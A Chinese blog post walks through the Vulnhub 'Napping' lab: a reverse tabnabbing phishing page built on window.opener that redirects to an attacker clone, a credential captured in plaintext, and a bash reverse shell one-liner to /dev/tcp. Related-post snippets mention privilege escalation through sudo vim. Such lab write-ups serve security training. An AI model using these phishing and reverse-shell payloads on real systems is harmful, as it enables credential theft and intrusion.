Napping靶场实战

最新推荐文章于 2025-12-28 16:49:38 发布
原创 最新推荐文章于 2025-12-28 16:49:38 发布 · 311 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #运维

通过nmap搜索到靶机ip和开放端口,我们尝试访问80端口

发现是登录界面且可以注册,我们注册尝试

登录后发现可以提交页面,提交完链接后点击here即可跳转到链接界面

查了下发现使用a标签和target=_blank可以构成Reverse Tabnabbing钓鱼

在/var/www/html目录下放两个html文件,一个为站点首页(index.html),一个为钓鱼界面(test.html)

在kali上wget下载的网站首页文件为.php,需要重命名为.html

wget http://172.16.2.74/index.php
mv index.php index.html

vim test.html
<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    	if(window.opener  != window)  window.opener.parent.location.replace('http://192.168.1.100:666/index.html');
    </script>
</body>
</html>

访问kali下的网页,需要开启http服务
并在kali监听端口,监听的端口为钓鱼页面里链接的端口

在输入链接处,提交创建的钓鱼页面,过个两三分钟后,返回了数据包

在返回的信息中发现了账号密码,密码这里需要url解码一下


daniel/C@ughtm3napping123,登录到daniel账号

进行反弹shell

bash -c 'bash -i >& /dev/tcp/172.16.2.71/6666 0>&1'

成功

Paper_F1nd
关注
napping靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-04 585
napping靶场渗透记录 Even admins can fall asleep on the job
napping靶场
m0_65939400的博客
07-29 838
所以,根据钓鱼漏洞的利用原理目前的思路就是在这里输入一个能够访问攻击机的链接,且该链接可以访问aa.html这一文件,而在shell文件中需要指向一个正常的网页,b.html。发现它向site_status.txt文件写入东西,查看该txt文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)请提交您的链接,以便我们可以开始。意思是所有链接都可以提交,随便提交一个链接查看页面源码。发现是一个登陆界面,并且可以注册账号。这里在用户的家目录下新建一个shell.sh文件。
Napping: 1.0.1靶场攻破
2402_83946446的博客
12-22 523
环境介绍靶机ip:192.168.56.112攻击机ip:192.168.56.111。
vulnhub-napping靶场通关攻略
2302_77969979的博客
07-29 236
15.一会儿后我们就得到了shell的连接,但是它只有vim权限,那我们就用vim进行提权。
Vulnhub靶场:NAPPING: 1.0.1
weixin_69670995的博客
06-05 1564
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
【Vulnhub靶场Napping 1.0.1
Nailaoyyds的博客
06-15 1118
查看开启端口和服务,登录框可以从弱密码、注册口,子目录,注入等手段入手。 注册账号试试水 登录后发现有跳转点,可以跳转到输入的链接。 先看一下正常链接,发现是可以执行的 利用恶意链接 直接用kali访问该页面。 监听到账号密码 query.py这个py文件是可以执行的,可以在里边写入反弹shell。建立shell文件,导入py文件中执行。文件差不多两分钟自动执行一次。 给shell.sh文件权限。..................
4-vulnhub靶场napping
qq_49078152的博客
08-21 518
vulnhub靶场napping,vim提权,2>/dev/null过滤
【Vulnhub靶场NAPPING: 1.0.1
DG_s1mple
04-01 6703
环境准备 下载靶机导入到vmware 攻击机IP地址为:192.168.2.18 靶机IP地址为:192.168.2.16 信息收集 我们使用nmap扫描一下靶机开放的端口信息 靶机开放了ssh跟http服务 我们首先访问一下他的http服务 是一个登录界面,并且可以注册账号,我们先注册一下 有一个文本框,我们测试一下功能 发现我们输入什么网站,他就跳转到什么网站,这么会存在Tabnabbing攻击 使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面
napping靶机教程(超详细讲解)
weixin_74124665的博客
07-29 1482
下载完成后,直接用VM打开,这样的话点一下重试就好了。然后右击虚拟机设置网络连接改成nat模式。
NAPPING: 1.0.1靶场(Vulnhub系列)
m0_73062138的博客
05-03 994
因此,Raskin将此手法称为标签绑架(tabnapping),他指出当使用者连上一个嵌有第三方script程序或Flash工具的网页时,就会让自己曝露于风险中,因为相关的恶意软件得以侦测使用者经常使用或正在使用的网络服务,在用户暂时离开该网页后,该网页内容及网页标签会悄悄地变身成为伪造的网络服务,并诱导用户输入个人信息。发现是个登录框,进行了简单的漏洞探测,发现没什么可以利用的点,变进行了目录扫描,但是也没有发现可以利用的点。等标签里的一个属性设置,它的作用是规定链接或者表单提交之后的页面打开方式。
NAPPING
10-24
标题"NAPPING"可能指的是一个与字体设计或者艺术相关的项目,因为"字体"是给定的标签之一。在IT行业中,字体通常涉及到用户界面(UI)设计、网页设计、图形设计等领域,是信息传达的重要组成部分。字体的选择和设计...
vulnhub靶场6:napping
Genarior的专栏
05-16 320
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
【java入门到放弃】网络
最新发布
WZDBXHNL的博客
12-28 601
防火墙既可以是硬件,也可以是软件,本质上是一种,而不是只能对应某一种形态。
OSI与TCP/IP:网络协议栈深度解析
m0_62928331的博客
12-23 731
【代码】OSI与TCP/IP:网络协议栈深度解析。
做了一块可以调用百度云语音识别api和tts api的esp32 s3开发板,支持跑ai小智机器人的源码,基于idf5.5.1库编译,分享下
net3m33的专栏
12-25 855
做了一块可以调用百度云语音识别api和语音合成tts接口的esp32 s3开发板,支持跑ai小智机器人的源码,基于idf5.5.1库编译,分享
手写TCP/IP协议栈——实现ping响应不可达
Tandy12356_的博客
12-27 389
打开Tftp32软件,选择Tftp Client选项,配置目的主机的IP地址,下面几个内容随便填。对方检查校验和出现问题就直接丢包了,不会给我们回应,但是可以使用wireshark提醒。同时对于TCP和UDP的校验和检查也可以提前勾选上(后面会用到)编辑 -> 首选项 -> 协议 -> IPV4 勾上校验和检查。wireshark抓包ICMP不可达响应截图。点击Get之后可以向目的主机发送请求。
无响应的状态码分析
Vincent0sen的博客
12-24 517
Langflow 处理某些 Flow 时,如果调用了底层的 C++ 库(如向量数据库 Chroma、Faiss 或某些 Transformer 算子),由于版本不兼容或内存非法访问,Python 解释器会直接**“闪崩”**。如果你的请求体(Payload)非常大,或者包含了某些可能被误认为攻击的特殊字符,本地的防火墙或安全软件可能会在连接中途强制注入一个 RST 包断开连接。如果 postgres 容器响应极慢,或者 SQLAlchemy 在某些极端并发下导致主线程挂起并超时断开连接,也可能出现此错误。
Linux系统编程(网络编程)
m0_64823929的博客
12-24 355
sudo vim /etc/network/interfaces 虚拟机网络配置文件 ,设置ip(手动分配,或自动分配)。ifconfig ens33 192.168.0.13/24 up 临时设置本机ip地址,重启后失效。sudo /etc/init.d/networking restart 进行网络设置的加载,ip地址版本, V4(主流) V6(未来的方向)传输层 ====》端口号tcp udp。接口层 ====》网卡 驱动 1GB。网络层 ====》IP 地址。应用层 ====》应用程序。
c#Socket学习,使用Socket创建一个在线聊天,日志笔记(5)
学不会shader
12-25 1020
32位整数:0x12345678高位字(High Word):0x1234(高16位)低位字(Low Word):0x5678(低16位)64位整数:0x123456789ABCDEF0高位双字(High Dword):0x12345678(高32位)低位双字(Low Dword):0x9ABCDEF0(低32位)
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来卸载模块。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值